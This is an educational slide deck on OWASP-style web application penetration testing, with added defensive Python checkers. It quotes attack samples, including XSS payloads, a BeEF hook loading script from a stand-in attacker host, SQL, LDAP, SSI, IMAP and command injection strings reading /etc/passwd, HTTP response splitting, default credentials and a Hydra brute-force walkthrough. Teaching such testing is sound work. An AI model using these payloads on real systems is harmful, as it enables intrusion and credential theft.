
Web application vulnerability assessment


This is my college project presentation #April 2014.

Published in: Education
  • Hi Ravi, Just gone through your presentation and found it extremely useful for beginners into Application Security. Keep up the good work always. :)


  1. o A penetration test is a method of evaluating the security of a computer system or network by simulating an attack.
     o A web application penetration test focuses only on evaluating the security of a web application.
     o The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities.
     o Any security issues that are found are presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.
  2. o What is a vulnerability? A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy.
     • A threat is a potential attack that, by exploiting a vulnerability, may harm the assets owned by an application (resources of value, such as the data in a database or in the file system).
     • A test is an action that tends to show a vulnerability in the application.
     And vulnerability is everywhere!!
  4. The OWASP Web Application Penetration Testing method is based on the black box approach: the tester knows nothing or very little about the application to be tested. The testing model consists of:
     o Tester: who performs the testing activities
     o Tools and methodology: the core of this Testing Guide project
     o Application: the black box to test
  5. The test is divided into 2 phases:
     1. Passive mode
     2. Active mode
     In the passive mode, the tester tries to understand the application's logic and plays with the application. Tools can be used for information gathering. At the end of this phase, the tester should understand all the access points (gates) of the application.
  6. In the active phase, the tester begins to test using the methodology. The set of active tests is split into 12 sub-categories for a total of 91 controls:
     I. Information Gathering
     II. Configuration and Deploy Management Testing
     III. Identity Management Testing
     IV. Authentication Testing
     V. Authorization Testing
     VI. Session Management Testing
     VII. Data Validation Testing
     VIII. Error Handling
     IX. Cryptography
     X. Logging
     XI. Business Logic Testing
     XII. Client Side Testing
  8. Information Gathering:
     1. Conduct Search Engine Discovery and Reconnaissance for Information Leakage
     2. Fingerprint Web Server
     3. Review Webserver Metafiles for Information Leakage
     4. Enumerate Applications on Webserver
     5. Review Webpage Comments and Metadata for Information Leakage
     6. Identify application entry points
     7. Map execution paths through application
     8. Fingerprint Web Application Framework
     9. Fingerprint Web Application
     10. Map Network and Application Architecture
  9. Google Hacking Database
  10. Using a search engine, search for:
      [1] Network diagrams and configurations
      [2] Archived posts and emails by administrators and other key staff
      [3] Logon procedures and username formats
      [4] User names and passwords
      [5] Error message content
      [6] Development, test, UAT and staging versions of the website
      Queries are put in several categories: Footholds; Files containing usernames; Sensitive Directories; Web Server Detection; Vulnerable Files; Vulnerable Servers; Error Messages; Files containing juicy info; Files containing passwords; Sensitive Online Shopping Info.
  11. Web application response
  12. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing.
  13. Review the robots.txt file for information leakage of the web application's directory/folder paths.
  14. Enumerating applications on the web server means finding out which particular applications are hosted on that server.
  15. Reverse-IP services
  17. Review webpage comments and metadata to better understand the application and to find any information leakage.
  18. Step 1) Navigate to the target page, intercept that request using Burp Suite and send the request to Intruder.
  19. Step 2) Go to the "Positions" tab, select "GET" and click the "Add" button.
  20. Step 3) Go to the "Payloads" tab and select "HTTP Verbs" in the Payload Options category.
  21. Step 4) Open the "Intruder" menu and select "Start attack".
  22. Observe the request and response.
  23. Response for the OPTIONS method
  25. Request made process
  27. The X-Powered-By header contains the development language name and version.
  28. Default cookie names reveal the framework in use, as does the directory structure (e.g. WordPress). For more framework cookie names refer to pages 75-76 of the documentation.
  29. Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build.
  30. This great tool works on the principle of static file checksum based version differences, thus providing very high quality fingerprinting. Language: Python
  31. Wappalyzer is a Firefox/Chrome plug-in.
  32. Web server fingerprinting is a critical task for the penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. Nmap version detection offers a lot of advanced features that can help in determining the services that are running on a given host; it obtains all data by connecting to open ports and interrogating them using probes that the specific services understand.
  33. • List all the possible administrative interfaces.
      • Determine if administrative interfaces are available from an internal network or are also available from the Internet.
      Firewall/IDS identifier script
  34. Configuration and Deploy Management Testing:
      1. Test Network/Infrastructure Configuration
      2. Test Application Platform Configuration
      3. Test File Extensions Handling for Sensitive Information
      4. Backup and Unreferenced Files for Sensitive Information
      5. Enumerate Infrastructure and Application Admin Interfaces
      6. Test HTTP Methods
      7. Test HTTP Strict Transport Security
      8. Test RIA cross domain policy
  35. Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or new vulnerabilities that might compromise the application itself.
      1. WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework.
      2. There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet.
  36. 1. Handle server errors (40x or 50x) with custom-made pages instead of the default web server pages.
      2. Logging information
      3. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default.
      4. Only enable server modules (ISAPI extensions in the IIS case) that are needed for the application.
  37. Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have later become known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache's Cocoon).
  39. When each file stem is tested, Burp checks for various different extensions, according to these settings.
  40. While most of the files within a web server are directly handled by the server itself, it isn't uncommon to find unreferenced and/or forgotten files that can be used to obtain important information about either the infrastructure or the credentials. Same as the previous test, but only for backup files.
  41. THC-Hydra for brute force attacks:
      1) Set the target port number or protocol
      2) Add the username and password lists
  42. 3) Start the attack; after some time we are able to get the root user's password.
  43. Refer to "Identify application entry points".
  44. HSTS header. The use of this header by web applications must be checked to find out whether the following security issues could arise:
      • Attackers sniffing the network traffic and accessing the information transferred through an unencrypted channel.
      • Attackers exploiting a man-in-the-middle attack because of the problem of accepting certificates that are not trusted.
      • Users who mistakenly entered an address in the browser with HTTP instead of HTTPS, or users who clicked on a link in a web application which mistakenly indicated the HTTP protocol.
      Strict-Transport-Security: max-age=60000; includeSubDomains
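An added example (not from the original slides) of how a tester can evaluate the header above: it parses the Strict-Transport-Security value following RFC 6797 (max-age mandatory, a repeated directive invalidates the whole header) and reports the weaknesses; the one-year minimum is an assumed baseline, and the sample header dict is constructed from the slide's value.

```python
"""Parse and assess a Strict-Transport-Security header as a tester would."""
from typing import Optional

ONE_YEAR = 31536000  # seconds; assumed minimum for max-age in this example


def parse_hsts(value: str) -> Optional[dict]:
    """Parse an HSTS value into {'max-age': int, 'includeSubDomains': bool, 'preload': bool}.

    Returns None when the header is invalid: max-age missing or non-numeric, or a
    directive repeated (RFC 6797 says the receiver must then ignore the header).
    """
    seen = set()
    result = {"max-age": None, "includeSubDomains": False, "preload": False}
    for raw in value.split(";"):
        raw = raw.strip()
        if not raw:
            continue
        name, _, val = raw.partition("=")
        name = name.strip().lower()
        if name in seen:
            return None  # duplicate directive: whole header is invalid
        seen.add(name)
        if name == "max-age":
            val = val.strip().strip('"')
            if not val.isdigit():
                return None
            result["max-age"] = int(val)
        elif name == "includesubdomains":
            result["includeSubDomains"] = True
        elif name == "preload":
            result["preload"] = True
        # unknown directives are ignored, as the RFC requires
    if result["max-age"] is None:
        return None
    return result


def hsts_findings(headers: dict, min_age: int = ONE_YEAR) -> list:
    """Return finding strings for the HSTS policy in a response-header dict (any case)."""
    value = None
    for k, v in headers.items():
        if k.lower() == "strict-transport-security":
            value = v
    if value is None:
        return ["HSTS header missing: first HTTP request can be downgraded/stripped"]
    policy = parse_hsts(value)
    if policy is None:
        return ["HSTS header present but malformed; browsers will ignore it"]
    findings = []
    if policy["max-age"] == 0:
        findings.append("max-age=0 disables HSTS for this host")
    elif policy["max-age"] < min_age:
        findings.append(f"max-age={policy['max-age']} is below {min_age} seconds")
    if not policy["includeSubDomains"]:
        findings.append("includeSubDomains absent: subdomains stay reachable over HTTP")
    return findings


# Constructed sample: the header shown on the slide (60000 s is under 17 hours)
SLIDE_HEADER = {"Strict-Transport-Security": "max-age=60000; includeSubDomains"}
```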
  45. Rich Internet Applications (RIA) have adopted Adobe's crossdomain.xml policy files in order to allow for controlled cross domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash.
  46. Identity Management Testing:
      1. Test Role Definitions
      2. Test User Registration Process
      3. Test Account Provisioning Process
      4. Testing for Account Enumeration and Guessable User Account
      5. Testing for Weak or unenforced username policy
  47. ROLE           PERMISSION   OBJECT            CONSTRAINTS
      Administrator  Read         Customer records
      Manager        Read         Customer records  Only records related to business unit
      Staff          Read         Customer records  Only records associated with customers assigned by Manager
      Customer       Read         Customer record   Only own record
  49. • Verify the identity requirements for user registration align with business/security requirements
      • Validate the registration process
  51. Verify which accounts may provision other accounts, and of what type.
  52. CN000100
      CN000101
      ….
      R1001 – user 001 for REALM1
      R2001 – user 001 for REALM2
  53. User account names are often highly structured (e.g. Joe Bloggs' account name is jbloggs and Fred Nurks' account name is fnurks) and valid account names can easily be guessed.
  54. Authentication Testing:
      1. Testing for Credentials Transported over an Encrypted Channel
      2. Testing for default credentials
      3. Testing for Weak lock out mechanism
      4. Testing for bypassing authentication schema
      5. Test remember password functionality
      6. Testing for Browser cache weakness
      7. Testing for Weak password policy
      8. Testing for Weak security question/answer
      9. Testing for weak password change or reset functionalities
      10. Testing for Weaker authentication in alternative channel
  55. SSLStrip
  56. A GET request sending the credentials
  57. User           Password
      Tester         Tester
      Webmaster      Webmaster
      Admin          Admin123
      System         System
      Administrator  admin
      ……             …….
  58. Accounts are typically locked after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-service unlock mechanism, or by intervention of an administrator.
  59. There are several methods to bypass the authentication schema in use by a web application:
      • Direct page request (forced browsing)
      • Parameter modification
      • Session ID prediction
      • SQL injection
  61. • Remember-password functionality stores your credentials in a cookie.
      • You must check whether the stored credentials are encrypted or not.
  62. Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0
      HTTP/1.1: Cache-Control: no-cache
      HTTP/1.0: Pragma: no-cache
                Expires: <past date or illegal value (e.g., 0)>
  63. The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high profile hacks that have revealed user credentials, it is lamented that the most common passwords are still: 123456, password
  64. Pre-generated questions: the majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example:
      • The answers may be known to family members or close friends of the user, e.g. "What is your mother's maiden name?", "What is your date of birth?"
      • The answers may be easily guessable, e.g. "What is your favorite color?", "What is your favorite baseball team?"
      • The answers may be brute forcible, e.g. "What is the first name of your favorite high school teacher?" - the answer is probably on some easily downloadable list of popular first names, and therefore a simple brute force attack can be scripted.
      • The answers may be publicly discoverable, e.g. "What is your favorite movie?" - the answer may easily be found on the user's social media profile page.
  65. In addition to the previous test it is important to verify: is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed, if an attacker is able to take control of a valid session, (s)he could easily change the victim's password.
  67. Authorization Testing:
      1. Testing Directory traversal/file include
      2. Testing for bypassing authorization schema
      3. Testing for Privilege Escalation
      4. Testing for Insecure Direct Object References
  69. • Is it possible to access that resource even if the user is not authenticated?
      • Is it possible to access that resource after the log-out?
      • Is it possible to access functions and resources that should be accessible to a user that holds a different role/privilege?
      POST /admin/addUser.jsp HTTP/1.1
      Host:
      [other HTTP headers]
      userID=fakeuser&role=3&group=grp001
  70. POST /user/viewOrder.jsp HTTP/1.1
      Host: ……
      groupID=grp001&orderID=0001
      Verify if a user that does not belong to grp001 can modify the value of the parameters 'groupID' and 'orderID' to gain access to that privileged data.
  71. HTTP/1.1 200 OK
      Server: Netscape-Enterprise/6.0
      Date: Wed, 1 Apr 2006 13:51:20 GMT
      Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/;
      Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=
      Cache-Control: no-cache
      Pragma: No-cache
      Content-length: 247
      Content-Type: text/html
      Expires: Thu, 01 Jan 1970 00:00:00 GMT
      Connection: close
      <form name="autoriz" method="POST" action = "visual.jsp">
      <input type="hidden" name="profile" value="SysAdmin">
      <body onload="document.forms.autoriz.submit()">
      </td>
      </tr>
  72. Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object.
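As an added example (not from the slides or the OWASP guide), here is the server-side logic that makes the two requests on slides 69 and 70 safe: the order lookup ignores the client's groupID and compares the record's owner with the authenticated session's group, and addUser requires an admin session and caps the requested role. The users, orders and role numbers are constructed, and the vulnerable variant is kept beside the fixed one to show the difference.

```python
"""Function-level and object-level authorization for the slides' two requests."""
from dataclasses import dataclass

ROLE_ADMIN = 3  # constructed meaning for the slide's role=3 parameter


@dataclass(frozen=True)
class Session:
    user: str
    role: int
    group: str


# Constructed data store: order id -> owning group
ORDERS = {"0001": "grp001", "0002": "grp002"}


class Forbidden(Exception):
    pass


def view_order_vulnerable(session: Session, params: dict) -> str:
    """The IDOR on slide 70: trusts the client's groupID, so any user can read any order
    by changing the groupID/orderID pair to match a record they do not own."""
    if ORDERS.get(params["orderID"]) == params["groupID"]:
        return f"order {params['orderID']} for {params['groupID']}"
    raise Forbidden()


def view_order(session: Session, params: dict) -> str:
    """Object-level check: ownership comes from the server-side record and the
    session; the client-supplied groupID is never consulted."""
    owner = ORDERS.get(params["orderID"])
    if owner is None or owner != session.group:
        raise Forbidden()  # same answer for 'missing' and 'not yours' avoids enumeration
    return f"order {params['orderID']} for {owner}"


def add_user(session: Session, params: dict) -> dict:
    """Function-level check for /admin/addUser.jsp (slide 69): only an admin session may
    create users, and the new account's role is capped at the caller's own role."""
    if session.role != ROLE_ADMIN:
        raise Forbidden()
    requested_role = int(params.get("role", 1))
    return {
        "userID": params["userID"],
        "role": min(requested_role, session.role),
        "group": session.group,  # group is taken from the session, not the request
    }


def granted(fn, session: Session, params: dict) -> bool:
    """True if the call is allowed, False if it raises Forbidden."""
    try:
        fn(session, params)
        return True
    except Forbidden:
        return False
```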
  74. Session Management Testing:
      1. Testing for Bypassing Session Management Schema
      2. Testing for Cookies attributes
      3. Testing for Session Fixation
      4. Testing for Exposed Session Variables
      5. Testing for Cross Site Request Forgery
      6. Testing for logout functionality
      7. Test Session Timeout
      8. Testing for Session puzzling
  75. If you have access to the session management schema implementation, you can check for the following:
      • Random session token
      • Token length
      • Session time-out
      • Cookie configuration:
        o non-persistent: only RAM memory
        o secure (set only on HTTPS channel): Set-Cookie: cookie=data; path=/;; secure
        o HTTPOnly (not readable by a script): Set-Cookie: cookie=data; path=/;; HTTPOnly
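An added example (not from the original slides) that applies the cookie checks listed above to Set-Cookie headers and adds a rough length and character-entropy sanity check for session tokens. The sample headers are constructed from the response on slide 71, the list of session cookie names is an assumption, and the thresholds (16 characters, 3 bits per character) are illustrative.

```python
"""Audit Set-Cookie headers for Secure, HttpOnly, persistence and token quality."""
import math
from collections import Counter
from typing import Dict, List


def parse_set_cookie(header_value: str) -> Dict:
    """Parse one Set-Cookie value into name, value and a lower-cased attribute map."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        if not p:
            continue
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def shannon_entropy_bits(token: str) -> float:
    """Bits per character estimated from the token's own character frequencies.
    A crude screen only: it catches constant or near-constant tokens, not predictable ones."""
    counts = Counter(token)
    n = len(token)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def audit_cookies(set_cookie_headers: List[str],
                  session_names=("session", "jsessionid", "phpsessid")) -> List[str]:
    """Return one finding string per weakness found across the given Set-Cookie values."""
    findings = []
    for raw in set_cookie_headers:
        c = parse_set_cookie(raw)
        a = c["attrs"]
        if "secure" not in a:
            findings.append(f"{c['name']}: missing Secure, may be sent over plain HTTP")
        if "httponly" not in a:
            findings.append(f"{c['name']}: missing HttpOnly, readable by script (XSS)")
        if "expires" in a or "max-age" in a:
            findings.append(f"{c['name']}: persistent cookie, survives browser close")
        if c["name"].lower() in session_names:  # assumed names of session cookies
            if len(c["value"]) < 16:
                findings.append(f"{c['name']}: session token only {len(c['value'])} chars")
            if shannon_entropy_bits(c["value"]) < 3.0:
                findings.append(f"{c['name']}: session token has low character entropy")
    return findings


# Constructed sample modelled on the slide 71 response (no Secure, no HttpOnly),
# plus a hardened cookie with a deliberately constant token to trip the entropy check
SAMPLE_SET_COOKIES = [
    "SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=",
    "USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; Expires=Thu, 01 Jan 2026 00:00:00 GMT",
    "PHPSESSID=aaaaaaaaaaaaaaaaaaaa; path=/; Secure; HttpOnly",
]
```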
  78. Session ID before login
  79. Session ID after login
  80. • How are Session IDs transferred? e.g., GET, POST, Form Field (including hidden fields)
      • Are Session IDs always sent over encrypted transport by default?
      • Is it possible to manipulate the application to send Session IDs unencrypted? e.g., by changing HTTP to HTTPS?
      • What cache-control directives are applied to requests/responses passing Session IDs?
      • Are these directives always present? If not, where are the exceptions?
      • Are GET requests incorporating the Session ID used?
      • If POST is used, can it be interchanged with GET?
  81. Request submission without any CSRF request token. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.
  82. Testing for logout functionality:
      • Testing for logout user interface
      • Testing for server-side session termination
      • Testing for session timeout
      • Testing session clean-up at client side
      In this phase, we check that the application automatically logs out a user when that user has been idle for a certain amount of time, ensuring that it is not possible to "reuse" the same session and that no sensitive data remains stored in the browser cache.
  83. This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.
  84. Data Validation Testing:
      1. Testing for Reflected Cross Site Scripting
      2. Testing for Stored Cross Site Scripting
      3. Testing for HTTP Verb Tampering
      4. Testing for HTTP Parameter pollution
      5. Testing for SQL Injection
         5.1 Oracle Testing
         5.2 MySQL Testing
         5.3 SQL Server Testing
         5.4 Testing PostgreSQL
         5.5 MS Access Testing
         5.6 Testing for NoSQL injection
         ………..
  85. 6. Testing for LDAP Injection
      7. Testing for ORM Injection
      8. Testing for XML Injection
      9. Testing for SSI Injection
      10. Testing for XPath Injection
      11. IMAP/SMTP Injection
      12. Testing for Code Injection
          12.1 Testing for Local File Inclusion
          12.2 Testing for Remote File Inclusion
      13. Testing for Command Injection
      14. Testing for Buffer overflow
          14.1 Testing for Heap overflow
          14.2 Testing for Stack overflow
          14.3 Testing for Format string
      15. Testing for incubated vulnerabilities
      16. Testing for HTTP Splitting/Smuggling
  86. Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser-executable code within a single HTTP response.
      <script>alert(123)</script>
      Bypass XSS filters: page #224
  87. "><script>alert(document.cookie)</script>
  88. BeEF hook: "><script src=http://attackersite/hook.js></script>
  89. Step 1) Navigate to the target page, intercept that request using Burp Suite and send the request to Intruder.
  90. Step 2) Go to the "Positions" tab, select "GET" and click the "Add" button.
  91. Step 3) Go to the "Payloads" tab and select "HTTP Verbs" in the Payload Options category.
  92. Step 4) Open the "Intruder" menu and select "Start attack".
  93. Observe the request and response.
  94. Web Application Server Backend                  Parsing Result                      Example
      ASP.NET / IIS                                   concatenated with a comma           color=red,blue
      ASP / IIS                                       concatenated with a comma           color=red,blue
      PHP / Apache                                    last occurrence only                color=blue
      PHP / Zeus                                      last occurrence only                color=blue
      JSP, Servlet / Apache Tomcat                    first occurrence only               color=red
      JSP, Servlet / Oracle Application Server 10g    first occurrence only               color=red
      JSP, Servlet / Jetty                            first occurrence only               color=red
      IBM Lotus Domino                                last occurrence only                color=blue
      IBM HTTP Server                                 first occurrence only               color=red
      mod_perl, libapreq2 / Apache                    first occurrence only               color=red
      Perl CGI / Apache                               first occurrence only               color=red
      mod_wsgi (Python) / Apache                      first occurrence only               color=red
      Python / Zope                                   all occurrences in List data type   color=['red','blue']
  95. Authentication bypass
      POST / HTTP/1.1
      security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue& acker email)&ok=Invite
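An added example (not from the original slides) that encodes the parsing table above and shows why the parameter-pollution request on slide 95 is dangerous: the same query string yields a different value for each backend, and a front-end filter that reads one occurrence can be bypassed when the backend reads the other. The behaviour labels are a constructed encoding of the table, and the duplicate-parameter check is the normalisation a reverse proxy or WAF should perform.

```python
"""Interpret duplicated query parameters the way each listed backend does."""
from urllib.parse import parse_qsl
from typing import Dict, List

# Same rows as the slide's table, reduced to one of four behaviours
BACKEND_BEHAVIOUR = {
    "ASP.NET / IIS": "concat",
    "ASP / IIS": "concat",
    "PHP / Apache": "last",
    "PHP / Zeus": "last",
    "JSP, Servlet / Apache Tomcat": "first",
    "JSP, Servlet / Oracle Application Server 10g": "first",
    "JSP, Servlet / Jetty": "first",
    "IBM Lotus Domino": "last",
    "IBM HTTP Server": "first",
    "mod_perl, libapreq2 / Apache": "first",
    "Perl CGI / Apache": "first",
    "mod_wsgi (Python) / Apache": "first",
    "Python / Zope": "list",
}


def interpret(query: str, backend: str) -> Dict:
    """Return the parameter map the given backend would see for a raw query string."""
    behaviour = BACKEND_BEHAVIOUR[backend]
    seen: Dict[str, List[str]] = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        seen.setdefault(key, []).append(value)
    out = {}
    for key, values in seen.items():
        if behaviour == "first":
            out[key] = values[0]
        elif behaviour == "last":
            out[key] = values[-1]
        elif behaviour == "concat":
            out[key] = ",".join(values)
        else:  # "list": Zope returns a list only when the name repeats
            out[key] = values if len(values) > 1 else values[0]
    return out


def disagreeing_backends(query: str, param: str) -> Dict[str, object]:
    """Map each backend to the value it would use for `param`; more than one distinct
    value means a front-end check and the backend can be made to disagree."""
    return {b: interpret(query, b).get(param) for b in BACKEND_BEHAVIOUR}


def duplicated_params(query: str) -> List[str]:
    """Names that occur more than once: what a proxy should reject or normalise
    before any component reads a different occurrence than another."""
    counts: Dict[str, int] = {}
    for key, _ in parse_qsl(query, keep_blank_values=True):
        counts[key] = counts.get(key, 0) + 1
    return sorted(k for k, n in counts.items() if n > 1)


# Constructed inputs: the table's example and the shape of the slide 95 request
TABLE_QUERY = "color=red&color=blue"
BYPASS_QUERY = "security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&ok=Invite"
```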
  102. LDAP injection testing is similar to SQL injection testing. The differences are that we use the LDAP protocol instead of SQL and that the target is an LDAP server instead of a SQL server.
       "(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))";
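An added example (not from the original slides) that builds the filter shown above in the unsafe concatenated form beside a version that escapes the user-controlled pieces as RFC 4515 requires, and includes a structural check a reviewer can use to tell the two apart. The `{MD5}` encoding mirrors the slide's PHP expression; all function names are constructed.

```python
"""LDAP search filter construction: concatenated (as on the slide) vs escaped."""
import base64
import hashlib


def ldap_escape(value: str) -> str:
    """Escape the characters RFC 4515 gives special meaning inside a filter value:
    backslash, asterisk, parentheses and NUL become \\XX hex escapes."""
    out = []
    for ch in value:
        if ch in "\\*()\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def md5_userpassword(password: str) -> str:
    """{MD5} userPassword value as on the slide: base64 of the raw MD5 digest
    (kept only to reproduce the slide; not a recommended password scheme)."""
    digest = hashlib.md5(password.encode()).digest()
    return "{MD5}" + base64.b64encode(digest).decode()


def build_filter_vulnerable(user: str, password: str) -> str:
    """Direct concatenation, as on the slide: the user value becomes filter syntax."""
    return "(&(uid=" + user + ")(userPassword=" + md5_userpassword(password) + "))"


def build_filter(user: str, password: str) -> str:
    """Same filter with both user-controlled values escaped before insertion."""
    return "(&(uid=%s)(userPassword=%s))" % (
        ldap_escape(user),
        ldap_escape(md5_userpassword(password)),
    )


def filter_has_single_uid_assertion(ldap_filter: str) -> bool:
    """Cheap structural check for the final filter: exactly one '(uid=' assertion and
    balanced parentheses. Input that smuggles extra assertions fails this."""
    return (ldap_filter.count("(uid=") == 1
            and ldap_filter.count("(") == ldap_filter.count(")"))
```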
  103. An ORM is an Object Relational Mapping tool. It is used to expedite object oriented development within the data access layer of software applications, including web applications. Testing for ORM injection vulnerabilities is identical to SQL injection testing (see Testing for SQL Injection).
       Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'"
       Simply sending "' OR 1--" in the form where the order date can be entered can yield positive results.
  105. Web servers usually give developers the ability to add small pieces of dynamic code inside static HTML pages, without having to deal with full-fledged server-side or client-side languages. This feature is provided by Server-Side Includes (SSI); abusing it is SSI injection.
  106. .shtml file. Putting an SSI directive into a static HTML document is as easy as writing a piece of code like the following:
       <!--#echo var="DATE_LOCAL" -->
       to print out the current time.
       <!--#include virtual="/cgi-bin/" -->
       to include the output of a CGI script.
       <!--#include virtual="/footer.html" -->
       to include the content of a file or list files in a directory.
       <!--#exec cmd="ls" -->
       to include the output of a system command.
  108. FETCH 4791 BODY[HEADER]
       In this scenario, the IMAP injection structure would be:
       http://<webmail>/read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791
       which would generate the following commands:
       ???? FETCH 4791 BODY[HEADER]
       V100 CAPABILITY
       V101 FETCH 4791 BODY[HEADER]
       where:
       Header = 4791 BODY[HEADER]
       Body   = %0d%0aV100 CAPABILITY%0d%0a
       Footer = V101 FETCH 4791
       Result expected: arbitrary IMAP/SMTP command injection
  109. cs.jpg?&cmd=uname%20-a
  111. Testing for Local File Inclusion
  113. Testing for Remote File Inclusion
  114. http://sensitive/cgi-bin/
       http://sensitive/cgi-bin/
       http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
  117. advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>
       The resulting answer from the vulnerable application will therefore be the following:
       HTTP/1.1 302 Moved Temporarily
       Date: Sun, 03 Dec 2005 16:22:19 GMT
       Location:
       Content-Length: 0

       HTTP/1.1 200 OK
       Content-Type: text/html
       Content-Length: 35

       <html>Sorry,%20System%20Down</html>
       <other data>
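One validator for the two CRLF-based injections on slides 108 and 117, added here as an example that is not part of the original deck: the IMAP FETCH argument built from message_id and the redirect Location built from a query parameter both fail the same way (an encoded %0d%0a becomes a real line break), so the same decode-then-reject check protects both. The sample inputs are taken from the slides; the function names and the response counter are constructed.

```python
"""Reject CR/LF in decoded parameters before they reach IMAP commands or HTTP headers."""
import re
from urllib.parse import unquote

CRLF_RE = re.compile(r"[\r\n]")


class InjectionRejected(ValueError):
    pass


def decoded_has_line_break(raw_param: str) -> bool:
    """True when a (possibly URL-encoded) parameter contains CR or LF after decoding."""
    return CRLF_RE.search(unquote(raw_param)) is not None


def imap_fetch_command(tag: str, message_id_param: str) -> str:
    """Build 'TAG FETCH <id> BODY[HEADER]' only if the id is a plain decimal number.
    Anything else, e.g. the slide's '4791 BODY[HEADER]%0d%0aV100 CAPABILITY...', is refused,
    so no second tagged command can be smuggled onto the IMAP connection."""
    decoded = unquote(message_id_param)
    if not re.fullmatch(r"[1-9][0-9]*", decoded):
        raise InjectionRejected("message_id must be a positive integer")
    return f"{tag} FETCH {decoded} BODY[HEADER]"


def location_header(page_param: str, base: str = "http://example.invalid/") -> str:
    """Build a Location value from the 'page' parameter, refusing line breaks so the
    response cannot be split into a second, attacker-written response."""
    decoded = unquote(page_param)
    if CRLF_RE.search(decoded):
        raise InjectionRejected("line break in redirect target")
    return base + decoded


def count_responses(raw_response: str) -> int:
    """Number of 'HTTP/1.x <status>' lines in one server answer; more than one means the
    response was split (the slide's forged 200 following the real 302)."""
    return len(re.findall(r"^HTTP/1\.[01] \d{3}", raw_response, flags=re.M))


def rejects(fn, *args) -> bool:
    """True when fn raises InjectionRejected for these arguments."""
    try:
        fn(*args)
    except InjectionRejected:
        return True
    return False


# Constructed: the two payloads as they appear (URL-encoded) on the slides
IMAP_PAYLOAD = "4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791"
SPLIT_PAYLOAD = ("advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK"
                 "%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a"
                 "<html>Sorry,%20System%20Down</html>")
```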
  118. Error Handling:
       1. Analysis of Error Codes
       2. Analysis of Stack Traces
  121. Cryptography:
       1. Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection
       2. Testing for Padding Oracle
       3. Testing for Sensitive information sent via unencrypted channels
  126. Logging:
       1. Test time synchronisation
       2. Test user-viewable log of authentication events
  127. 200 OK
       Date: Tue, 15 Oct 2013 14:11:09 GMT
       Server: Apache
       X-Frame-Options: Deny
       X-XSS-Protection: 1; mode=block
       X-Content-Type-Options: nosniff
       Content-Language: en
       Vary: Accept-Encoding,Cookie
       Expires: Wed, 16 Oct 2013 14:11:09 GMT
       Cache-Control: max-age=86400
       Content-Encoding: gzip
       Content-Type: text/html; charset=UTF-8
  129. Client Side Testing:
       1. Testing for DOM based Cross Site Scripting
       2. Testing for JavaScript Execution
       3. Testing for HTML Injection
       4. Testing for Client Side URL Redirect
       5. Testing for CSS Injection
       6. Testing for Client Side Resource Manipulation
       7. Test Cross Origin Resource Sharing
       8. Testing for Cross Site Flashing
       9. Testing for Clickjacking
       10. Testing WebSockets
       11. Test Web Messaging
       12. Test Local Storage
  133. nin1.0&appctx=retUrl=xxxxx.xxxx/
  134. ;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
       ;-:expression(alert(URL=1)); (IE 7/8)
